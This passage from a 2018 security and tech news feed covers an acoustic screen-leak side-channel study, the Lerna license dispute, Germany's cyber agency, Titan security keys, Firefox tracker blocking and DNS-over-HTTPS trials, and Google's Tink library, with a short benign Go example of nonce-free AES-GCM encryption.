“Our actions against these threats may not always be immediately visible to you, but this is a battle we have been fighting, and will continue to fight for the foreseeable future. And of course, we’ll continue to communicate openly with you about these subjects” says the Reddit team.

For more information, read the official FireEye report.
Fatema Patrawala
03 Sep 2018
6 min read

Researchers find a way to spy on remote screens through the Webcam mic and machine learning

With a little help from machine learning, you might know what the people on the other end of a Hangouts session are really looking at on their screens. Based on research published at the CRYPTO 2018 Conference in Santa Barbara last week, your webcam could give away details of what's on your screen, if the person on the other end is listening the right way. All they need to do is process the audio picked up by your microphone.

Daniel Genkin of the University of Michigan, Mihir Pattani of the University of Pennsylvania, Roei Schuster of Cornell Tech and Tel Aviv University, and Eran Tromer of Tel Aviv University and Columbia University investigated a potential new avenue of remote surveillance dubbed "Synesthesia". It is a side-channel attack that can reveal the contents of a remote screen, providing access to potentially sensitive information based solely on "content-dependent acoustic leakage from LCD screens."

Anyone who remembers working with cathode ray tube monitors is familiar with the phenomenon of coil whine. Even though LCD screens consume a lot less power than the old cathode ray tube (CRT), they still generate the same sort of noise, though in a totally different frequency range.

Because of the way computer screens render a display—sending signals to each pixel of each line with varying intensity levels for each sub-pixel—the power sent to each pixel fluctuates as the monitor goes through its refresh scans. Variations in the intensity of each pixel create fluctuations in the sound created by the screen's power supply, leaking information about the image being refreshed—information that can be processed with machine learning algorithms to extract details about what's being displayed.

That audio could be captured and recorded in a number of ways, as demonstrated by the researchers:

  • Over a device's embedded microphone or an attached webcam microphone during a Skype, Google Hangouts, or other streaming audio chat
  • Through recordings from a nearby device, such as a Google Home or Amazon Echo
  • Over a nearby smartphone, or with a parabolic microphone from distances up to 10 meters

Even a reasonably cheap microphone could pick up and record the audio from a display, even though it is just on the edge of human hearing. And it turns out that audio can be exploited with a little bit of machine learning black magic.

The researchers began by attempting to recognize simple, repetitive patterns. They created a simple program that displays patterns of alternating horizontal black and white stripes of equal thickness (in pixels), which they refer to as "Zebras" in their paper. These "zebras" each had a different period, measured by the distance in pixels between black stripes. As the program ran, the team recorded the sound emitted by a Soyo DYLM2086 monitor. With each different period of stripes, the frequency of the ultrasonic noise shifted in a predictable manner.

The variations in the audio only really provide reliable data about the average intensity of a particular line of pixels, so they can't directly reveal the content of a screen. However, by applying supervised machine learning in three different types of attacks, the researchers demonstrated that it was possible to extract a surprising amount of information about what was on the remote screen.

After training, a neural-network-generated classifier was able to reliably identify which of the Alexa top 10 websites was being displayed on a screen based on audio captured over a Google Hangouts call—with 96.5 percent accuracy.

In a second experiment, the researchers were able to reliably capture on-screen keyboard strokes on a display in portrait mode (the typical tablet and smartphone configuration) with 96.4 percent accuracy, for transition times of one and three seconds between key "taps." On a landscape-mode display, accuracy of the classifiers was much lower, with a first-guess success rate of only 40.8 percent. However, the correct typed word was in the top three choices 71.9 percent of the time for landscape mode, meaning that further human analysis could still result in accurate data capture. (The correct typed word was in the top three choices for the portrait mode classifier 99.6 percent of the time.)

In a third experiment, the researchers used guided machine learning in an attempt to extract text from displayed content based on the audio—a much more fine-grained sort of data than detecting changes in screen keyboard intensity. In this case, the experiment focused on a test set of 100 English words and also used somewhat ideal display settings for this sort of capture: all the letters were capitalized (in the Fixedsys Excelsior typeface with a character size 175 pixels wide) and black on an otherwise white screen. The results, as the team reported them, were promising:

"The per-character validation set accuracy (containing 10% of our 10,000 trace collection) ranges from 88% to 98%, except for the last character where the accuracy was 75%. Out of 100 recordings of test words, for two of them preprocessing returned an error. For 56 of them, the most probable word on the list was the correct one. For 72 of them, the correct word appeared in the list of top-five most probable words."

While these tests were all done with a single monitor type, the researchers also demonstrated that a "cross screen" attack was possible—by using a remote connection to display the same image on a remote screen and recording the audio, it was possible to calibrate a baseline for the targeted screen.

It's clear that there are limits to the practicality of acoustic side-channels as a means of remote surveillance. But as people move to use mobile devices such as smartphones and tablets for more computing tasks—with embedded microphones, limited screen sizes, and a more predictable display environment—the potential for these sorts of attacks could rise. And mitigating the risk would require re-engineering of current screen technology. So, while it remains a small risk, it's certainly one that those working with sensitive data will need to keep in mind—especially if they're spending much time in Google Hangouts with that data on-screen.

Read more on this page.
Natasha Mathur
31 Aug 2018
2 min read

Lerna development team quickly reverses decision to block ICE Contractors from using its Software

It was only two days ago that Jamie Kyle, a Lerna developer, decided to modify Lerna’s license to ban companies that are U.S. Immigration and Customs Enforcement (ICE) contractors from using the software. This decision has now been reverted by the Lerna core team, and Kyle has been removed from the development project. Any organization that wishes to use the Lerna software is now free to use it.

On Wednesday, Kyle stated on GitHub that he had been deeply disturbed by ICE’s behavior with American immigrants, and that the companies who have collaborated with ICE “don’t have any licensing rights” and that “any use of Lerna will be considered theft”.

Daniel Stockman, a core Lerna contributor, removed Kyle from the project yesterday morning and pointed out that the license change was a “rash decision” that was “unenforceable”. He also added that there were “several past violations of [Lerna’s] code of conduct”, as there were instances when Kyle’s behavior was rude and impolite.

As reported to Motherboard, Kyle thinks his removal from the team is a result of Stockman’s discussion of the issue with Microsoft employees. But Stockman denied the characterization to Motherboard. “I think developers can be activists if they so choose, and I support tools and licenses designed to make this easier,” said Stockman. He added that his willingness to revoke the relicensing doesn’t mean that he is an ICE supporter, describing ICE as “monstrous” and saying it “must be abolished”.

Public opinion about Lerna’s current decision is varied:

https://twitter.com/alicegoldfuss/status/1035214998375559173
https://twitter.com/xander76/status/1034842377775529984
https://twitter.com/chriseppstein/status/1034863523493339136
https://twitter.com/benwiley4000/status/1035031630333796352
https://twitter.com/siziyman/status/1035051041111326720

“Open source, even in a project where there is only one active contributor, is never just about one individual. Even acquiescence from multiple core contributors is not sufficient to justify a change like this,” says Stockman.

For more coverage on the news, check out the post by Motherboard.
Melisha Dsouza
31 Aug 2018
2 min read

Skepticism welcomes Germany’s DARPA-like cybersecurity agency - The federal agency tasked with creating cutting-edge defense technology

On Wednesday, the German government announced the creation of a new federal agency to develop cutting-edge cyber defense technology. The agency would resemble the U.S. Defense Advanced Research Projects Agency (DARPA) and would be managed by the Ministry of Defense and the Ministry of the Interior.

Germany has a background of rising numbers of cyber attacks. German Defense Minister Ursula von der Leyen affirms that the agency would encourage Germany’s investment in new technologies and in the protection of critical digital infrastructure. The agency will also be partnering with other EU countries on agency projects.

The DARPA-like agency is intended to make Germany more independent in its fight against cyber threats. Ministers in Chancellor Angela Merkel’s government said on Wednesday that Germany will invest €200 million over the next five years to launch this agency, which will develop its own cyber defense capabilities.

The news, however, was not taken well by some lawmakers, who have expressed their concerns about the new agency. Military-led cyber warfare has been a disputed topic in Germany. Anke Domscheit-Berg, digital policy spokeswoman for the Left Party, expressed her concern on this matter. She believes that more digital security would definitely help Germany; however, her apprehension lies in the fact that the agency is located between the Defense Ministry and the Interior Ministry.

Green Party spokesman Konstantin von Notz argued that the agency will work against the Foreign Ministry’s work. In a statement released to DW, von Notz mentioned that the agency would massively undermine the Foreign Ministry’s efforts at the UN to outlaw cyber weapons. “Instead of promoting a spiraling escalation in the digital space, the government needs to make a U-turn on IT security.”

Read the entire coverage of this article on DW for more insights on the matter.
Prasad Ramesh
31 Aug 2018
3 min read

Google Titan Security key with secure FIDO two factor authentication is now available for purchase

In July, Google announced the Titan Security Keys, built with a hardware chip to verify key integrity. They are now available for purchase from the Google store.

The security key looks like a dongle and provides two factor authentication, which is more secure than just a username and password. These Titan keys are based on the FIDO standards, which Google considers the strongest and most phishing-resistant two factor authentication method. The security key was initially made available to Google Cloud users. Now it is available to the public.

How does the Google Titan key protect your account?

Security keys are based on a standard public key cryptography protocol. The client first registers a public key with the online service. Then, during authentication, the online service asks the client to prove its ownership of the private key with a cryptographic signature.

Google jointly contributed the two factor authentication technical specifications to the FIDO Alliance and launched support for Gmail in 2014. The company has been working with Yubico and NXP to develop security keys internally since 2012.

In a Google Cloud Blog post, Christiaan Brand, Product Manager, Google Cloud stated, “At Google, we have had no reported or confirmed account takeovers due to password phishing since we began requiring security keys as a second factor for our employees.”

Google has engineered the firmware in the chips with security in mind. This firmware is permanently sealed in a secure hardware chip during manufacture and is resilient to hardware attacks.

FIDO has standardized the authentication protocol used between the client and server. This protocol is being implemented in popular operating systems like Android and Chrome, as well as in the Chrome browser. The security keys can be used to authenticate to services like Google, Dropbox, Facebook, GitHub, Salesforce, Stripe, and Twitter.

Do you need it?

If you have important information in your accounts or would like stronger security as an individual or for your organization, the Google Titan key is a good option. It is available for $50 in the Google store (only US for now) and includes a Bluetooth and USB key with the required connectors.

For more details visit the Google Cloud Blog.
Melisha Dsouza
31 Aug 2018
3 min read

Upcoming Firefox update will, by default, protect users privacy by blocking ad tracking

Mozilla is taking a stand against web advertising practices with an announcement today that its Firefox browser will soon block web trackers by default. Users can expect a series of updates over the next few months as this feature becomes a reality. This proactive approach to protecting consumer privacy aims to give users more choice over what information they share with third party sites.

Mozilla has always been at the forefront of assuring users of data privacy. It started off by blocking pop-up ads in the very first public Firefox release in 2004. The wholesale blocking of ads and trackers in private browsing mode, starting in 2015, is another testament to the fact. Mozilla has made it clear that even though some sites will continue to want user data in exchange for content, they will have to ask users for it. This gives advertising platforms a reason to care about their users’ experience and is a positive change for people who up until now had no idea of the value exchange they were asked to make.

Mozilla’s three key initiatives to put this approach into practice:

#1 Improving page load performance

A new feature will be introduced in Firefox Nightly that blocks trackers that slow down page loads. Loading third party trackers slows down the loading of a website as a whole. For users on slower networks, the effect is worse. This degrades the user’s experience on the web. Firefox will study the effects of blocking trackers and test the new feature using a shield study in September. If the approach succeeds in improving page performance, slow-loading trackers will be blocked by default in Firefox 63.

#2 Removing cross-site tracking

Users expect a certain level of privacy on the web. However, many web browsers fail to help users obtain the level of privacy that they should be entitled to. Taking this into account, Firefox will strip cookies and block storage access from third-party tracking content. This is already available for Firefox Nightly users to try out. A shield study will be carried out with some beta users in September to check this feature. All Firefox 65 users can expect this update coming their way soon. After all, no one appreciates the thought of being constantly tracked by third-party sites to obtain information in secret.

#3 Mitigating harmful practices

The third approach Mozilla is taking is to block harder-to-detect practices like fingerprinting, a technique that allows trackers to invisibly identify users by their device properties. This will also put a stop to crypto mining scripts that silently mine cryptocurrencies on the user’s device.

The Twitter community has received this news well and many Firefox users have expressed their appreciation of this initiative.

The November release of Firefox 57 added an option to let people block all trackers. Worldwide, 1.3 percent of people enable Firefox tracking protection today, which means that, out of 250 million monthly active users, it represents the choice of about 3 million people. Now, as a bonus, users can block ad trackers as well!

This goes to show the level of trust that users have in Firefox, and we are sure that, like always, Firefox will not disappoint. You can read the detailed news of the upcoming update on Mozilla’s official blog.
Natasha Mathur
31 Aug 2018
2 min read

Tink 1.2.0: Google’s new multi-language, cross platform, cryptographic library to secure data  

Google announced yesterday the release of Tink 1.2.0, a new version of its multi-language, cross-platform cryptographic library for securing data. Earlier versions of Tink are already in use by Google to secure the data of products such as AdMob, Google Pay, Google Assistant, Firebase, the Android Search App, etc.

Tink 1.2.0 is built on top of libraries such as BoringSSL and Java Cryptography Architecture. It comprises cryptographic APIs that are secure, easy to use, and hard to misuse. With Tink 1.2.0, cryptographic operations like data encryption and digital signatures require only a few lines of code.

It focuses on eliminating as many misuses as possible. For instance, if the encryption mode needs nonces and reusing nonces would make the encryption mode less secure, then Tink does not allow the user to pass nonces.

Tink 1.2.0 also indicates security properties (e.g., safe against chosen-ciphertext attacks) directly in interfaces. This enables security auditors and automated tools to quickly discover usages where security guarantees don’t align with the security requirements. It provides support for key management, which includes key rotation and phasing out of deprecated ciphers.

Other than that, Tink 1.2.0 is customizable. This means that it is easy to add a custom cryptographic scheme or an in-house key management system that can work seamlessly with other parts of Tink. All the parts of Tink are easily removable as well as composable. The components in Tink 1.2.0 can be selected and assembled in various combinations. As an example, if only digital signatures are needed, then symmetric key encryption components can be excluded to reduce the code size in your application.

For more information, check out the official Google blog.
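The nonce rule mentioned above (the caller is never allowed to pass a nonce) can be shown with a small Go wrapper. This is an added example, not code from Tink or from the original article: the `AEAD` type and `NewAEAD` are hypothetical names, and AES-GCM from Go's standard library stands in for Tink's primitives.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
)

// AEAD is a hypothetical wrapper (not Tink's API). Its methods take
// plaintext and associated data only; there is no nonce parameter to misuse.
type AEAD struct{ gcm cipher.AEAD }

// NewAEAD builds AES-GCM from a 16-, 24- or 32-byte key.
func NewAEAD(key []byte) (*AEAD, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	return &AEAD{gcm}, nil
}

// Encrypt draws a fresh random nonce per call; output is nonce || ciphertext || tag.
func (a *AEAD) Encrypt(plaintext, aad []byte) ([]byte, error) {
	nonce := make([]byte, a.gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	return a.gcm.Seal(nonce, nonce, plaintext, aad), nil
}

// Decrypt splits off the nonce and authenticates before returning plaintext.
func (a *AEAD) Decrypt(ct, aad []byte) ([]byte, error) {
	n := a.gcm.NonceSize()
	if len(ct) < n+a.gcm.Overhead() {
		return nil, fmt.Errorf("ciphertext too short: %d bytes", len(ct))
	}
	return a.gcm.Open(nil, ct[:n], ct[n:], aad)
}

func main() {
	a, _ := NewAEAD(make([]byte, 32)) // constructed all-zero demo key
	c, _ := a.Encrypt([]byte("hello"), []byte("ctx"))
	fmt.Printf("%x\n", c)
}
```

Because the nonce is generated inside `Encrypt`, encrypting the same message twice yields different ciphertexts, and a caller cannot reuse a nonce under the same key by accident.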
Prasad Ramesh
30 Aug 2018
2 min read

Facebook unfriends Twitter. Cross-posted tweets on Facebook disappear temporarily.

Following Facebook’s move to restrict cross-posts from other platforms earlier this month via changes to its API platform, many users noticed their old Twitter posts disappearing from Facebook this week. The cross-posting option lets users publish their Twitter posts to Facebook automatically. The absence of cross-posting was first noticed by users who relied heavily on it to keep their Facebook accounts active. Without that feature, the Twitter app for Facebook was not of much use.

This caused a lot of old posts to disappear, first noticed around August 26, leaving users furious. Some users’ profiles were left fairly empty since they relied on cross-posting to keep their accounts active.

The Facebook API platform changes are part of Facebook’s plan to take strict measures against misuse of its platform after the Cambridge Analytica scandal at the start of this year. Since then, Facebook has been making a variety of efforts to prevent data misuse; stopping third parties from being able to post to Facebook is one of them.

TechCrunch was the first to report on the sudden disappearance of cross-posts from Twitter, and Facebook confirmed to them the same day that it was checking the issue. Common belief is that changes in the API to prevent cross-posting would not have mass-deleted all the older posts.

Following these changes from Facebook, Twitter asked Facebook for its app to be deleted from their platform. The result was users’ old Twitter posts on Facebook getting deleted. It turns out that this was just a bug, and it is now fixed. In a statement to Axios, Facebook cleared up the confusion, saying "A Twitter admin requested their app be deleted, which resulted in content that people had cross-posted from Twitter to Facebook also being temporarily removed from people’s profiles. However, we have since restored the past content and it's now live on people’s profiles."

You can find the original report on TechCrunch.
Fatema Patrawala
30 Aug 2018
4 min read

Firefox Nightly’s Secure DNS Experimental Results out

During July 2018, a planned Firefox Nightly experiment was performed involving secure DNS via the DNS over HTTPS (DoH) protocol. About 25,000 Firefox Nightly 63 users who had agreed to be part of Nightly experiments participated in this study. Cloudflare operated the DoH servers that were used, according to the privacy policy they had agreed to with Mozilla. Each user was additionally given information directly in the browser about the project. That information included the service provider and an opportunity to decline participation in the study.

Browser users are currently experiencing spying and spoofing of their DNS information due to reliance on the unsecured traditional DNS protocol. Using a trusted cloud-based DoH service in place of traditional DNS is a significant change in how networking operates, and it raises many things to consider going forward when selecting servers. However, the initial experiment focused on validating two separate important technical questions: Does the use of a cloud DNS service perform well enough to replace traditional DNS? Does the use of a cloud DNS service create additional connection errors?

The experiment is now complete and here are the highlights of the findings:

Using HTTPS with a cloud service provider shows a minor performance impact on the majority of non-cached DNS queries as compared to traditional DNS. Most queries were around 6 milliseconds slower, which seems to be an acceptable cost for the benefit of securing the data. However, the slowest DNS transactions performed much better with the new DoH-based system than the traditional one, sometimes hundreds of milliseconds better.

Source: Firefox Nightly

The above chart shows the net improvement of the DoH performance distribution vs the traditional DNS performance distribution. The fastest DNS exchanges are at the left of the chart and the slowest at the right. The slowest 20% of DNS exchanges are radically improved (improvements of several seconds are truncated for chart formatting reasons at the extreme), while the majority of exchanges exhibit a small, tolerable amount of overhead when using a cloud service. This is a good result.

The Firefox team hypothesized that the improvements at the tail of the distribution derived from two advantages DoH provides compared to traditional DNS. First, the consistency of the service operation: when dealing with thousands of different operating-system resolvers, some are bound to be overloaded, unmaintained, or forwarded to strange locations. Second, HTTP’s use of modern loss recovery and congestion control allows it to operate better on very busy or low-quality networks.

The experiment also considered connection error rates and found that users using the DoH cloud service in ‘soft-fail’ mode experienced no statistically significant difference in the rate of connection errors compared with users in a control group using traditional DNS. Soft-fail mode primarily uses DoH, but it will fall back to traditional DNS when a name does not resolve correctly or when a connection to the DoH-provided address fails. The connection error rate measures whether an HTTP channel can be successfully established from a name and therefore incorporates the fallbacks into its measurements. These fallbacks are needed to ensure seamless operation in the presence of firewalled services and captive portals.

“We’re committed long term to building a larger ecosystem of trusted DoH providers that live up to a high standard of data handling. We’re also working on privacy preserving ways of dividing the DNS transactions between a set of providers, and/or partnering with servers geographically. Future experiments will likely reflect this work as we continue to move towards a future with secured DNS deployed for all of our users,” says the Firefox Nightly team.